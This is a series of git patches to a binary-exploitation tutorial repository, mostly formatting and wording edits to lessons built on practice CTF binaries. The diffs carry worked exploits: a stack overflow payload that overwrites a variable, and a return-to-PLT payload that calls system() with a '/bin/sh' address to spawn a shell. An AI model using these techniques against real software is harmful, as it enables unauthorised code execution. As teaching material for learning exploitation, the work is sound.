the address of the string `"Hello World!"` into the memory address that `%esp` -points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out -whatever is at the address we supplied. +These instructions are what actually print out `"Hello World!"`. The program moves the address of the string `"Hello World!"` into the memory address that `%esp` points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out whatever is at the address we supplied. -``` +```asm 0x08048432 <+21>: leave 0x08048433 <+22>: ret ``` -The last two instructions just return control from our `main()` function back to the C -library, which does some clean up and then exits the program. We'll be learning more -about how these binaries function in later tutorials. +The last two instructions return control from our `main()` function back to the C library, which then does some clean up and exits the program. We'll be learning more about how these binaries function in later tutorials. From 03927c2ce8dfda1e1a776481a1f9d80b59c5ddf6 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:22:05 -0500 Subject: [PATCH 44/48] Code formatting for stack dumps and phrasing --- intro-2/README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/intro-2/README.md b/intro-2/README.md index 767aaf7..832b312 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,4 +1,4 @@ -# Intro 2: Screwing aroung with the stack. +# Intro 2: Screwing around with the stack. **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** @@ -43,7 +43,7 @@ You can tell just by reading through this file that the obvious objective here i Here's an example stack dump: -``` +```salt $ ./overflow1-3948d17028101c40 Usage: stack_overwrite [str] $ ./overflow1-3948d17028101c40 AAAA @@ -77,7 +77,7 @@ Sorry, you lose. Now if you know a thing or two about ASCII, you'll know that `0x41` is the value of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) -``` +```salt /overflow1-3948d17028101c40 $(python -c 'print "A"*76') Stack dump: 0xfff577d4: 0xfff58853 (second argument) @@ -107,7 +107,7 @@ win = 1094795585 Sorry, you lose. ``` -This shell command: `$(python -c 'print "A"*76')` tells python to print out 76 "A"s. +This shell command: `$(python -c 'print "A"*76')` tells python to print out the `A` character 76 times. Notice that the addresses on the left are completely different than the first run. This is normal, and due to something called `ASLR`, or Address Space Layout Randomization. Most modern OSes have `ASLR` enabled, which is protection that randomizes stack addresses on each run of a program. @@ -134,7 +134,7 @@ We want to set `win` equal to the *integer* representation of `1`, not the chara Since `win` is right after our buffer on the stack, we can just write 64 `A`'s in character format, followed by a single `"\x01"` to our buffer. This will leak the last byte (`0x01`) of the buffer we wrote to where `win` is stored, setting `win = 1`. -``` +```salt $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') Stack dump: 0xffe29f04: 0xffe2b85e (second argument) From c598d78eab67439a379c919968216536b101b817 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:25:24 -0500 Subject: [PATCH 45/48] Delete .gdb_history --- .gdb_history | 2 -- 1 file changed, 2 deletions(-) delete mode 100644 .gdb_history diff --git a/.gdb_history b/.gdb_history deleted file mode 100644 index 0ceeaa5..0000000 --- a/.gdb_history +++ /dev/null @@ -1,2 +0,0 @@ -clear -q From b8e829383e151de4aad8befa0bd7e2e259494fbb Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:27:45 -0500 Subject: [PATCH 46/48] README update --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7183044..4802cf5 100644 --- a/README.md +++ b/README.md @@ -35,12 +35,12 @@ a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of these tutorials. It provides a wide range of useful functions and makes `gdb` - far more user friendly. Just follow the install instructions in the repo. + far more user friendly. Just follow the installation instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an exploit framework built in my favorite language, python. It has a whole slew of useful functions and chicanery that makes the exploit process more fun and - less painful. It can be installed by running `sudo pip install pwntools` + less painful. Install with: `$ sudo pip install pwntools` ## Introductory Tutorials: From b611bfcdd4f22bbcbe8881399643c7b632284794 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 03:48:24 -0500 Subject: [PATCH 47/48] Added code formatting --- exercise-2/README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/exercise-2/README.md b/exercise-2/README.md index 3e751cb..cd25e1b 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -25,7 +25,7 @@ Now unlike the last problem, you might notice that there is no call to `system(" Let's take a look at the disassembly to learn a bit more about `system()` -``` +```gdb $ gdb -q ./overflow Reading symbols from ./overflow...(no debugging symbols found)...done. gdb-peda$ disas main @@ -42,7 +42,7 @@ Dump of assembler code for function main: Now what is `system@plt`? This is a crucial part. This binary is dynamically linked. This means that the binary makes calls to an actual libc file that gets put into memory. Luckily for us, dynamically linked binaries have PLT stubs. Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, it's address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going to do this? Since the PLT is a part of the binary, we'll use `objdump`. -``` +```objdump $ objdump -d overflow | grep system 080483d0 : 8048560: e8 6b fe ff ff call 80483d0 @@ -50,7 +50,7 @@ $ objdump -d overflow | grep system Now let's try to break the binary. -``` +```salt $ strace ./overflow $(python -c 'print "A"*44') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- @@ -58,7 +58,7 @@ $ strace ./overflow $(python -c 'print "A"*44') We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer register. This is the same as overwriting a return value. It simply means that we have control over the control flow. Now let's supply our address. -``` +```shell ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"') Good thing you don't have /bin/sh Good luck getting a shell. @@ -73,7 +73,7 @@ Now this is really weird. What happened here is that we called `system()`. We di Now when the programmer wrote this, (I wrote this one :P) he thought he could be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the binary. We can use `gdb` to find the string! -``` +```gdb $ gdb -q ./overflow Reading symbols from overflow...(no debugging symbols found)...done. gdb-peda b*main @@ -90,7 +90,7 @@ overflow : 0x804963a ("/bin/sh") Now you'll notice that two of these are in the binary. I'll just pick the first one and run with it. Finally, our finished exploit looks like so: -``` +```shell ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + "\x3a\x86\x04\x08"') ``` From f598e01c3c6c103464e2ebcc6a9ac1e06b1e5915 Mon Sep 17 00:00:00 2001 From: sneakerhax Date: Sun, 17 Jun 2018 14:47:09 -0700 Subject: [PATCH 48/48] Update README.md Add a break down of the exploit --- exercise-3/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/exercise-3/README.md b/exercise-3/README.md index 5d85810..addfb27 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -143,4 +143,16 @@ Let's give the exploit a try: "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"') ``` +The layout of the exploit looks like the following: + +``` + + + + + +<"/b"> + + + + <"/in"> + + + + <"sh"> + + + +``` + + You should get a shell, although you won't be able to do much as we didn't set privs. The concept, however, still stands.